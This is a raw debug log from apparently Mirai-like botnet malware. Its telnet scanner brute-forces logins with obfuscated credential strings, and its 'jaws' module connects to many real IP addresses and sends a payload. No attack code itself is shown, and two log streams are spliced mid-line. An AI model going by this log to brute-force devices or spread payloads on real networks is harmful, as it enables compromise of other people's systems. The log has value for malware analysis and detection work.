[TelnetScanner] FD53 connection gracefully closed
[TelnetScanner] FD53 lost connection
[TelnetScanner] FD53 retrying with different auth combo!
[TelnetScanner] FD47 connection gracefully closed
[TelnetScanner] FD47 lost connection
[TelnetScanner] FD47 retrying with different auth combo!
[TelnetScanner] FD49 connection gracefully closed
[TelnetScanner] FD49 lost connection
[TelnetScanner] FD49 retrying with different auth combo!
[TelnetScanner] FD52 connection gracefully closed
[TelnetScanner] FD52 lost connection
[TelnetScanner] FD52 retrying with different auth combo!
[TelnetScanner] FD91 connection gracefully closed
[TelnetScanner] FD91 lost connection
[TelnetScanner] FD91 retrying with different auth combo!
[TelnetScanner] FD91 connected. Trying :DFGC
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :%D180
[TelnetScanner] FD84 connected. Trying :
[TelnetScanner] FD105 connection gracefully closed
[TelnetScanner] FD105 lost connection
[TelnetScanner] FD105 retrying with different auth combo!
[TelnetScanner] FD105 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :1;NGND
[TelnetScanner] FD29 connection gracefully closed
[TelnetScanner] FD29 lost connection
[TelnetScanner] FD29 retrying with different auth combo!
[TelnetScanner] FD30 connection gracefully closed
[TelnetScanner] FD30 lost connection
[TelnetScanner] FD30 retrying with different auth combo!
[TelnetScanner] FD29 connected. Trying :DFGE
[TelnetScanner] FD30 connected. Trying :A;F
[TelnetScanner] FD79 connection gracefully closed
[TelnetScanner] FD79 lost connection
[TelnetScanner] FD79 retrying with different auth combo!
[TelnetScanner] FD79 connected. Trying :
[TelnetScanner] FD78 connection gracefully closed
[TelnetScanner] FD78 lost connection
[TelnetScanner] FD78 retrying with different auth combo!
[TelnetScanner] FD80 connection gracefully closed
[TelnetScanner] FD80 lost connection
[TelnetScanner] FD80 retrying with different auth combo!
[TelnetScanner] FD78 connected. Trying :
[TelnetScanner] FD80 connected. Trying :A;F
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD109 connection gracefully closed
[TelnetScanner] FD109 lost connection
[TelnetScanner] FD109 retrying with different auth combo!
[TelnetScanner] FD31 timed out (state = 1)
[TelnetScanner] FD87 timed out (state = 1)
[TelnetScanner] FD109 connected. Trying :
[TelnetScanner] FD110 connection gracefully closed
[TelnetScanner] FD110 lost connection
[TelnetScanner] FD31 retrying with different auth combo!
[TelnetScanner] FD87 Attempting to brute found IP 13.39.156.73
[TelnetScanner] FD110 Attempting to brute found IP 35.172.109.56
[TelnetScanner] FD31 connected. Trying :,CDG
[TelnetScanner] FD87 connected. Trying :
[TelnetScanner] FD110 connected. Trying :9%1N
[TelnetScanner] FD115 connection gracefully closed
[TelnetScanner] FD115 lost connection
[TelnetScanner] FD115 retrying with different auth combo!
[TelnetScanner] FD115 connected. Trying :
[TelnetScanner] FD98 connected. Trying :GDE
[TelnetScanner] FD47 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :
[TelnetScanner] FD116 connection gracefully closed
[TelnetScanner] FD116 lost connection
[TelnetScanner] FD116 retrying with different auth combo!
[TelnetScanner] FD120 connection gracefully closed
[TelnetScanner] FD120 lost connection
[TelnetScanner] FD120 retrying with different auth combo!
[TelnetScanner] FD117 connection gracefully closed
[TelnetScanner] FD117 lost connection
[TelnetScanner] FD117 retrying with different auth combo!
[TelnetScanner] FD116 connected. Trying :
[TelnetScanner] FD120 connected. Trying :DFGE
[TelnetScanner] FD117 connected. Trying :
[TelnetScanner] FD118 connection gracefully closed
[TelnetScanner] FD118 lost connection
[TelnetScanner] FD118 retrying with different auth combo!
[TelnetScanner] FD119 connection gracefully closed
[TelnetScanner] FD119 lost connection
[TelnetScanner] FD119 retrying with different auth combo!
[TelnetScanner] FD118 connected. Trying :DFG@
[TelnetScanner] FD128 connection gracefully closed
[TelnetScanner] FD128 lost connection
[TelnetScanner] FD128 retrying with different auth combo!
[TelnetScanner] FD128 connected. Trying :DFGD
[TelnetScanner] FD123 connection gracefully closed
[TelnetScanner] FD123 lost connection
[TelnetScanner] FD123 retrying with different auth combo!
[TelnetScanner] FD123 connected. Trying :
[TelnetScanner] FD132 connection gracefully closed
[TelnetScanner] FD132 lost connection
[TelnetScanner] FD132 retrying with different auth combo!
[TelnetScanner] FD132 connected. Trying :DFGC
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD98 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :1;NGND
[TelnetScanner] FD6 connection gracefully closed
[TelnetScanner] FD6 lost connection
[TelnetScanner] FD6 retrying with different auth combo!
[TelnetScanner] FD6 connected. Trying :<@
[TelnetScanner] FD112 connection gracefully closed
[TelnetScanner] FD112 lost connection
[TelnetScanner] FD112 retrying with different auth combo!
[TelnetScanner] FD112 connected. Trying :
[TelnetScanner] FD113 connection gracefully closed
[TelnetScanner] FD113 lost connection
[TelnetScanner] FD113 retrying with different auth combo!
[TelnetScanner] FD113 connected. Trying :,CDG
[TelnetScanner] FD41 connected. Trying :%D180
[TelnetScanner] FD56 connection gracefully closed
[TelnetScanner] FD56 lost connection
[TelnetScanner] FD56 retrying with different auth combo!
[TelnetScanner] FD64 connection gracefully closed
[TelnetScanner] FD64 lost connection
[TelnetScanner] FD64 retrying with different auth combo!
[TelnetScanner] FD57 connection gracefully closed
[TelnetScanner] FD57 lost connection
[TelnetScanner] FD57 retrying with different auth combo!
[TelnetScanner] FD56 connected. Trying :DFG@
[TelnetScanner] FD74 connection gracefully closed
[TelnetScanner] FD74 lost connection
[TelnetScanner] FD74 retrying with different auth combo!
[TelnetScanner] FD73 connection gracefully closed
[TelnetScanner] FD73 lost connection
[TelnetScanner] FD73 retrying with different auth combo!
[TelnetScanner] FD73 connected. Trying :DFGD
[TelnetScanner] FD93 connection gracefully closed
[TelnetScanner] FD93 lost connection
[TelnetScanner] FD93 retrying with different auth combo!
[TelnetScanner] FD93 connected. Trying :9%1N
[TelnetScanner] FD121 connection gracefully closed
[TelnetScanner] FD121 lost connection
[TelnetScanner] FD121 retrying with different auth combo!
[TelnetScanner] FD121 connected. Trying :DFGC
[TelnetScanner] FD130 connection gracefully closed
[TelnetScanner] FD130 lost connection
[TelnetScanner] FD130 retrying with different auth combo!
[TelnetScanner] FD130 connected. Trying :
[TelnetScanner] FD131 connection gracefully closed
[TelnetScanner] FD131 lost connection
[TelnetScanner] FD131 retrying with different auth combo!
[TelnetScanner] FD131 connected. Trying :
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD98 connected. Trying :5
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :C
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :<@
[TelnetScanner] FD10 connection gracefully closed
[TelnetScanner] FD10 lost connection
[TelnetScanner] FD10 retrying with different auth combo!
[TelnetScanner] FD10 connected. Trying :, %?&
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :ECGG
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD98 connected. Trying :<@
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :DFGE
[TelnetScanner] FD64 connected. Trying :DFGE
[TelnetScanner] FD66 connection gracefully closed
[TelnetScanner] FD66 lost connection
[TelnetScanner] FD66 retrying with different auth combo!
[TelnetScanner] FD66 connected. Trying :
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :GFDO
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD98 connected. Trying :DFG@
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying ECFF:
[TelnetScanner] FD88 connection gracefully closed
[TelnetScanner] FD88 lost connection
[TelnetScanner] FD88 retrying with different auth combo!
[TelnetScanner] FD88 connected. Trying :5
[TelnetScanner] FD119 connected. Trying :
[TelnetScanner] FD90 connection gracefully closed
[TelnetScanner] FD90 lost connection
[TelnetScanner] FD90 retrying with different auth combo!
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD98 connected. Trying :
[TelnetScanner] FD95 connection gracefully closed
[TelnetScanner] FD95 lost connection
[TelnetScanner] FD95 retrying with different auth combo!
[TelnetScanner] FD96 connection gracefully closed
[TelnetScanner] FD96 lost connection
[TelnetScanner] FD96 retrying with different auth combo!
[TelnetScanner] FD92 connection gracefully closed
[TelnetScanner] FD92 lost connection
[TelnetScanner] FD92 retrying with different auth combo!
[TelnetScanner] FD95 connected. Trying :
[TelnetScanner] FD96 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :<@
[TelnetScanner] FD32 connection gracefully closed
[TelnetScanner] FD32 lost connection
[TelnetScanner] FD32 retrying with different auth combo!
[TelnetScanner] FD85 connection gracefully closed
[TelnetScanner] FD85 lost connection
[TelnetScanner] FD85 retrying with different auth combo!
[TelnetScanner] FD32 connected. Trying :A;F
[TelnetScanner] FD85 connected. Trying :GFDO
[TelnetScanner] FD83 connection gracefully closed
[TelnetScanner] FD83 lost connection
[TelnetScanner] FD83 retrying with different auth combo!
[TelnetScanner] FD58 connection gracefully closed
[TelnetScanner] FD58 lost connection
[TelnetScanner] FD58 retrying with different auth combo!
[TelnetScanner] FD68 connection gracefully closed
[TelnetScanner] FD68 lost connection
[TelnetScanner] FD68 retrying with different auth combo!
[TelnetScanner] FD69 connection gracefully closed
[TelnetScanner] FD69 lost connection
[TelnetScanner] FD69 retrying with different auth combo!
[TelnetScanner] FD82 connection gracefully closed
[TelnetScanner] FD82 lost connection
[TelnetScanner] FD82 retrying with different auth combo!
[TelnetScanner] FD86 connection gracefully closed
[TelnetScanner] FD86 lost connection
[TelnetScanner] FD86 retrying with different auth combo!
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD33 retrying with different auth combo!
[TelnetScanner] FD60 connection gracefully closed
[TelnetScanner] FD60 lost connection
[TelnetScanner] FD60 retrying with different auth combo!
[TelnetScanner] FD58 connected. Trying :
[TelnetScanner] FD62 connection gracefully closed
[TelnetScanner] FD62 lost connection
[TelnetScanner] FD62 retrying with different auth combo!
[TelnetScanner] FD83 connected. Trying :, %?&
[TelnetScanner] FD68 connected. Trying :
[TelnetScanner] FD69 connected. Trying :
[TelnetScanner] FD61 connection gracefully closed
[TelnetScanner] FD61 lost connection
[TelnetScanner] FD61 retrying with different auth combo!
[TelnetScanner] FD82 connected. Trying :%D180
[TelnetScanner] FD86 connected. Trying :9%1N
[TelnetScanner] FD33 connected. Trying :5
[TelnetScanner] FD60 connected. Trying :
[TelnetScanner] FD62 connected. Trying :GDEBC@
[TelnetScanner] FD61 connected. Trying :GDEBC@
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD55 timed out (state = 1)
[TelnetScanner] FD76 timed out (state = 1)
[TelnetScanner] FD97 timed out (state = 1)
[TelnetScanner] FD102 timed out (state = 1)
[TelnetScanner] FD98 connected. Trying :GDEBC@
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD55 Attempting to brute found IP 195.41.57.224
[TelnetScanner] FD76 Attempting to brute found IP 89.237.205.89
[TelnetScanner] FD97 Attempting to brute found IP 123.68.160.181
[TelnetScanner] FD102 Attempting to brute found IP 14.14.117.48
[TelnetScanner] FD16 connected. Trying :GDEBC@
[TelnetScanner] FD55 connected. Trying :A;F
[TelnetScanner] FD18 connection gracefully closed
[TelnetScanner] FD18 lost connection
[TelnetScanner] FD18 retrying with different auth combo!
[TelnetScanner] FD18 connected. Trying :DFGE
[TelnetScanner] FD57 connected. Trying :DFGE
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD20 connection gracefully closed
[TelnetScanner] FD20 lost connection
[TelnetScanner] FD20 retrying with different auth combo!
[TelnetScanner] FD20 connected. Trying :
[TelnetScanner] FD129 connection gracefully closed
[TelnetScanner] FD129 lost connection
[TelnetScanner] FD129 retrying with different auth combo!
[TelnetScanner] FD103 connection gracefully closed
[TelnetScanner] FD103 lost connection
[TelnetScanner] FD103 retrying with different auth combo!
[TelnetScanner] FD124 connection gracefully closed
[TelnetScanner] FD124 lost connection
[TelnetScanner] FD124 retrying with different auth combo!
[TelnetScanner] FD129 connected. Trying :ECGG
[TelnetScanner] FD103 connected. Trying :GFDO
[TelnetScanner] FD100 connection gracefully closed
[TelnetScanner] FD100 lost connection
[TelnetScanner] FD100 retrying with different auth combo!
[TelnetScanner] FD101 connection gracefully closed
[TelnetScanner] FD101 lost connection
[TelnetScanner] FD101 retrying with different auth combo!
[TelnetScanner] FD126 connection gracefully closed
[TelnetScanner] FD126 lost connection
[TelnetScanner] FD126 retrying with different auth combo!
[TelnetScanner] FD99 connection gracefully closed
[TelnetScanner] FD99 lost connection
[TelnetScanner] FD99 retrying with different auth combo!
[TelnetScanner] FD114 connection gracefully closed
[TelnetScanner] FD114 lost connection
[TelnetScanner] FD114 retrying with different auth combo!
[TelnetScanner] FD100 connected. Trying ECFF:
[TelnetScanner] FD101 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :1;NGND
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD48 timed out (state = 1)
[TelnetScanner] FD49 timed out (state = 1)
[TelnetScanner] FD51 timed out (state = 1)
[TelnetScanner] FD52 timed out (state = 1)
[TelnetScanner] FD53 timed out (state = 1)
[TelnetScanner] FD54 timed out (state = 1)
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD48 Attempting to brute found IP 208.245.225.213
[TelnetScanner] FD49 Attempting to brute found IP 1.122.163.118
[TelnetScanner] FD51 Attempting to brute found IP 96.38.255.158
[TelnetScanner] FD52 Attempting to brute found IP 14.241.10.28
[TelnetScanner] FD53 Attempting to brute found IP 223.124.132.242
[TelnetScanner] FD54 Attempting to brute found IP 24.123.163.202
[TelnetScanner] FD76 connected. Trying :DFGB
[TelnetScanner] FD97 connected. Trying :
[TelnetScanner] FD102 connected. Trying :GDE
[TelnetScanner] FD22 connection gracefully closed
[TelnetScanner] FD22 lost connection
[TelnetScanner] FD22 retrying with different auth combo!
[TelnetScanner] FD24 connection gracefully closed
[TelnetScanner] FD24 lost connection
[TelnetScanner] FD24 retrying with different auth combo!
[TelnetScanner] FD22 connected. Trying :GDE
[TelnetScanner] FD27 connection gracefully closed
[TelnetScanner] FD27 lost connection
[TelnetScanner] FD27 retrying with different auth combo!
[TelnetScanner] FD21 connection gracefully closed
[TelnetScanner] FD21 lost connection
[TelnetScanner] FD21 retrying with different auth combo!
[TelnetScanner] FD23 connection gracefully closed
[TelnetScanner] FD23 lost connection
[TelnetScanner] FD23 retrying with different auth combo!
[TelnetScanner] FD24 connected. Trying :GDE
[TelnetScanner] FD28 connection gracefully closed
[TelnetScanner] FD28 lost connection
[TelnetScanner] FD28 retrying with different auth combo!
[TelnetScanner] FD27 connected. Trying :
[TelnetScanner] FD21 connected. Trying :<@
[TelnetScanner] FD23 connected. Trying :
[TelnetScanner] FD28 connected. Trying :
[TelnetScanner] FD72 connection gracefully closed
[TelnetScanner] FD72 lost connection
[TelnetScanner] FD72 retrying with different auth combo!
[TelnetScanner] FD26 connection gracefully closed
[TelnetScanner] FD26 lost connection
[TelnetScanner] FD26 retrying with different auth combo!
[TelnetScanner] FD72 connected. Trying :GDE
[TelnetScanner] FD59 connection gracefully closed
[TelnetScanner] FD59 lost connection
[TelnetScanner] FD59 retrying with different auth combo!
[TelnetScanner] FD26 connected. Trying :A;FMomentum Debugging Mode
[main] We are the only process on this system!
[jaws] scanner process initialized. scanning started.
[jaws] FD14 connected to 122.205.212.37
[jaws] FD23 connected to 122.169.215.252
[jaws] FD35 connected to 122.131.180.9
[jaws] FD14 sending payload
[jaws] FD23 sending payload
[jaws] FD35 sending payload
[jaws] FD35 finished
[jaws] FD9 connected to 122.11.204.36
[jaws] FD10 connected to 122.135.63.251
[jaws] FD9 sending payload
[jaws] FD10 sending payload
[jaws] FD6 finished
[jaws] FD45 connected to 122.207.72.69
[jaws] FD45 sending payload
[jaws] FD46 connected to 122.25.79.68
[jaws] FD46 sending payload
[jaws] FD23 finished
[jaws] FD5 connected to 122.90.226.26
[jaws] FD5 sending payload
[jaws] FD11 connected to 122.235.77.254
[jaws] FD11 sending payload
[jaws] FD12 connected to 122.112.42.230
[jaws] FD12 sending payload
[jaws] FD8 connected to 61.193.62.195
[jaws] FD8 sending payload
[jaws] FD47 connected to 122.5.96.201
[jaws] FD47 sending payload
[jaws] FD45 finished
[jaws] FD9 connected to 2.38.207.188
[jaws] FD23 connected to 84.144.57.111
[jaws] FD7 finished
[jaws] FD5 finished
[jaws] FD9 sending payload
[jaws] FD23 sending payload
[jaws] FD35 connected to 84.23.96.12
[jaws] FD5 finished
[jaws] FD35 sending payload
[jaws] FD77 connected to 84.85.141.113
[jaws] FD77 sending payload
[jaws] FD9 connected to 5.249.138.238
[jaws] FD57 connected to 5.178.5.143
[jaws] FD67 connected to 84.81.119.48
[jaws] FD68 connected to 84.139.80.157
[jaws] FD71 connected to 84.45.231.49
[jaws] FD72 connected to 84.151.133.183
[jaws] FD9 sending payload
[jaws] FD57 sending payload
[jaws] FD67 sending payload
[jaws] FD68 sending payload
[jaws] FD71 sending payload
[jaws] FD72 sending payload
[jaws] FD6 finished
[jaws] FD15 finished
[jaws] FD15 connected to 5.107.217.153
[jaws] FD15 sending payload
[jaws] FD35 connected to 84.7.111.251
[jaws] FD64 connected to 84.92.173.168
[jaws] FD65 connected to 84.111.238.154
[jaws] FD66 connected to 84.64.124.72
[jaws] FD69 connected to 84.197.92.35
[jaws] FD70 connected to 84.149.222.138
[jaws] FD35 sending payload
[jaws] FD64 sending payload
[jaws] FD65 sending payload
[jaws] FD66 sending payload
[jaws] FD69 sending payload
[jaws] FD70 sending payload
[jaws] FD37 connected to 85.92.245.60
[jaws] FD37 sending payload
[jaws] FD7 connected to 5.178.227.196
[jaws] FD7 sending payload
[jaws] FD41 connected to 5.171.99.30
[jaws] FD43 connected to 5.15.113.154
[jaws] FD44 connected to 5.130.242.131
[jaws] FD41 sending payload
[jaws] FD43 sending payload
[jaws] FD44 sending payload
[jaws] FD7 finished
[jaws] FD7 connected to 2.231.33.129
[jaws] FD7 sending payload
[jaws] FD41 finished
[jaws] FD43 finished
[jaws] FD13 finished
[jaws] FD5 connected to 5.212.91.37
[jaws] FD23 connected to 5.164.133.156
[jaws] FD38 connected to 5.164.144.148
[jaws] FD39 connected to 5.78.47.105
[jaws] FD40 connected to 5.45.130.143
[jaws] FD42 connected to 5.81.119.128
[jaws] FD5 sending payload
[jaws] FD23 sending payload
[jaws] FD38 sending payload
[jaws] FD39 sending payload
[jaws] FD40 sending payload
[jaws] FD10 connected to 85.137.166.36
[jaws] FD42 sending payload
[jaws] FD49 connected to 85.64.204.246
[jaws] FD10 sending payload
[jaws] FD49 sending payload
[jaws] FD53 connected to 85.143.144.133
[jaws] FD57 connected to 85.149.198.53
[jaws] FD58 connected to 85.50.213.245
[jaws] FD59 connected to 85.29.246.106
[jaws] FD53 sending payload
[jaws] FD57 sending payload
[jaws] FD58 sending payload
[jaws] FD59 sending payload
[jaws] FD5 finished
[jaws] FD19 finished
[jaws] FD23 connected to 37.189.96.204
[jaws] FD8 finished
[jaws] FD11 finished
[jaws] FD12 finished
[jaws] FD22 finished
[jaws] FD23 sending payload
[jaws] FD9 connected to 85.36.120.66
[jaws] FD13 connected to 85.19.92.226
[jaws] FD16 connected to 85.153.166.65
[jaws] FD17 connected to 85.23.24.228
[jaws] FD47 connected to 85.19.5.77
[jaws] FD9 sending payload
[jaws] FD13 sending payload
[jaws] FD14 connected to 85.107.255.184
[jaws] FD16 sending payload
[jaws] FD17 sending payload
[jaws] FD41 connected to 85.12.150.86
[jaws] FD43 connected to
[TelnetScanner] FD59 connected. Trying :A;F
[TelnetScanner] FD107 connection gracefully closed
[TelnetScanner] FD107 lost connection
[TelnetScanner] FD107 retrying with different auth combo!
[TelnetScanner] FD107 connected. Trying :
[TelnetScanner] FD94 connection gracefully closed
[TelnetScanner] FD94 lost connection
[TelnetScanner] FD94 retrying with different auth combo!
[TelnetScanner] FD94 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :9%1N
[TelnetScanner] FD124 connected. Trying :ECGN
[TelnetScanner] FD99 connected. Trying :
[TelnetScanner] FD114 connected. Trying :9%1N
[TelnetScanner] FD126 connected. Trying :GFDO
[TelnetScanner] FD35 connection gracefully closed
[TelnetScanner] FD35 lost connection
[TelnetScanner] FD35 retrying with different auth combo!
[TelnetScanner] FD81 connection gracefully closed
[TelnetScanner] FD81 lost connection
[TelnetScanner] FD81 retrying with different auth combo!
[TelnetScanner] FD35 connected. Trying :DFGE
[TelnetScanner] FD81 connected. Trying ECFF:
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD98 connected. Trying :ECGN
[TelnetScanner] FD48 connected. Trying :<@
[TelnetScanner] FD49 connected. Trying :
[TelnetScanner] FD51 connected. Trying :,CDG
[TelnetScanner] FD52 connected. Trying :, %?&
[TelnetScanner] FD53 connected. Trying :DFGB
[TelnetScanner] FD54 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :
[TelnetScanner] FD77 connection gracefully closed
[TelnetScanner] FD77 lost connection
[TelnetScanner] FD77 retrying with different auth combo!
[TelnetScanner] FD77 connected. Trying :ECGN
[TelnetScanner] FD75 connection gracefully closed
[TelnetScanner] FD75 lost connection
[TelnetScanner] FD75 retrying with different auth combo!
[TelnetScanner] FD70 connection gracefully closed
[TelnetScanner] FD70 lost connection
[TelnetScanner] FD70 retrying with different auth combo!
[TelnetScanner] FD75 connected. Trying :GFDO
[TelnetScanner] FD65 connection gracefully closed
[TelnetScanner] FD65 lost connection
[TelnetScanner] FD65 retrying with different auth combo!
[TelnetScanner] FD67 connection gracefully closed
[TelnetScanner] FD67 lost connection
[TelnetScanner] FD67 retrying with different auth combo!
[TelnetScanner] FD70 connected. Trying :DFGC
[TelnetScanner] FD65 connected. Trying :
[TelnetScanner] FD67 connected. Trying :A;F
[TelnetScanner] FD104 connection gracefully closed
[TelnetScanner] FD104 lost connection
[TelnetScanner] FD104 retrying with different auth combo!
[TelnetScanner] FD106 connection gracefully closed
[TelnetScanner] FD106 lost connection
[TelnetScanner] FD106 retrying with different auth combo!
[TelnetScanner] FD104 connected. Trying :DFG@
[TelnetScanner] FD106 connected. Trying :A;F
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD98 connected. Trying :
[TelnetScanner] FD90 connected. Trying :
[TelnetScanner] FD92 connected. Trying :
[TelnetScanner] FD17 connection gracefully closed
[TelnetScanner] FD17 lost connection
[TelnetScanner] FD17 retrying with different auth combo!
[TelnetScanner] FD12 connection gracefully closed
[TelnetScanner] FD12 lost connection
[TelnetScanner] FD12 retrying with different auth combo!
[TelnetScanner] FD17 connected. Trying :
[TelnetScanner] FD12 connected. Trying :GDE
[TelnetScanner] FD14 connection gracefully closed
[TelnetScanner] FD14 lost connection
[TelnetScanner] FD14 retrying with different auth combo!
[TelnetScanner] FD15 connection gracefully closed
[TelnetScanner] FD15 lost connection
[TelnetScanner] FD15 retrying with different auth combo!
[TelnetScanner] FD14 connected. Trying :
[TelnetScanner] FD15 connected. Trying :
[TelnetScanner] FD13 connection gracefully closed
[TelnetScanner] FD13 lost connection
[TelnetScanner] FD13 retrying with different auth combo!
[TelnetScanner] FD25 connection gracefully closed
[TelnetScanner] FD25 lost connection
[TelnetScanner] FD25 retrying with different auth combo!
[TelnetScanner] FD13 connected. Trying :
[TelnetScanner] FD36 connection gracefully closed
[TelnetScanner] FD36 lost connection
[TelnetScanner] FD36 retrying with different auth combo!
[TelnetScanner] FD36 connected. Trying :9%1N
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD19 connection gracefully closed
[TelnetScanner] FD19 lost connection
[TelnetScanner] FD19 retrying with different auth combo!
[TelnetScanner] FD19 connected. Trying :, %?&
[TelnetScanner] FD37 connection gracefully closed
[TelnetScanner] FD37 lost connection
[TelnetScanner] FD37 retrying with different auth combo!
[TelnetScanner] FD39 connection gracefully closed
[TelnetScanner] FD39 lost connection
[TelnetScanner] FD39 retrying with different auth combo!
[TelnetScanner] FD45 connection gracefully closed
[TelnetScanner] FD45 lost connection
[TelnetScanner] FD45 retrying with different auth combo!
[TelnetScanner] FD39 connected. Trying :
[TelnetScanner] FD40 connection gracefully closed
[TelnetScanner] FD40 lost connection
[TelnetScanner] FD40 retrying with different auth combo!
[TelnetScanner] FD38 connection gracefully closed
[TelnetScanner] FD38 lost connection
[TelnetScanner] FD38 retrying with different auth combo!
[TelnetScanner] FD42 connection gracefully closed
[TelnetScanner] FD42 lost connection
[TelnetScanner] FD42 retrying with different auth combo!
[TelnetScanner] FD44 connection gracefully closed
[TelnetScanner] FD44 lost connection
[TelnetScanner] FD44 retrying with different auth combo!
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD42 connected. Trying :5
[TelnetScanner] FD46 connection gracefully closed
[TelnetScanner] FD46 lost connection
[TelnetScanner] FD46 retrying with different auth combo!
[TelnetScanner] FD46 connected. Trying :
[TelnetScanner] FD50 connection gracefully closed
[TelnetScanner] FD50 lost connection
[TelnetScanner] FD50 retrying with different auth combo!
[TelnetScanner] FD50 connected. Trying :5
[TelnetScanner] FD71 connection gracefully closed
[TelnetScanner] FD71 lost connection
[TelnetScanner] FD71 retrying with different auth combo!
[TelnetScanner] FD63 connection gracefully closed
[TelnetScanner] FD63 lost connection
[TelnetScanner] FD63 retrying with different auth combo!
[TelnetScanner] FD71 connected. Trying :
[TelnetScanner] FD63 connected. Trying :DFGE
[TelnetScanner] FD89 connection gracefully closed
[TelnetScanner] FD89 lost connection
[TelnetScanner] FD89 retrying with different auth combo!
[TelnetScanner] FD89 connected. Trying :%D180
[TelnetScanner] FD106 connection gracefully closed
[TelnetScanner] FD106 lost connection
[TelnetScanner] FD106 retrying with different auth combo!
[TelnetScanner] FD106 connected. Trying :1;NGND
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD74 timed out (state = 1)
[TelnetScanner] FD98 connected. Trying :DFG@
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD74 Attempting to brute found IP 91.67.229.140
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD74 connected. Trying :DFGE
[TelnetScanner] FD111 connection gracefully closed
[TelnetScanner] FD111 lost connection
[TelnetScanner] FD111 retrying with different auth combo!
[TelnetScanner] FD125 connection gracefully closed
[TelnetScanner] FD125 lost connection
[TelnetScanner] FD125 retrying with different auth combo!
[TelnetScanner] FD108 connection gracefully closed
[TelnetScanner] FD108 lost connection
[TelnetScanner] FD108 retrying with different auth combo!
[TelnetScanner] FD122 connection gracefully closed
[TelnetScanner] FD122 lost connection
[TelnetScanner] FD122 retrying with different auth combo!
[TelnetScanner] FD111 connected. Trying :9%1N
[TelnetScanner] FD125 connected. Trying :, %?&
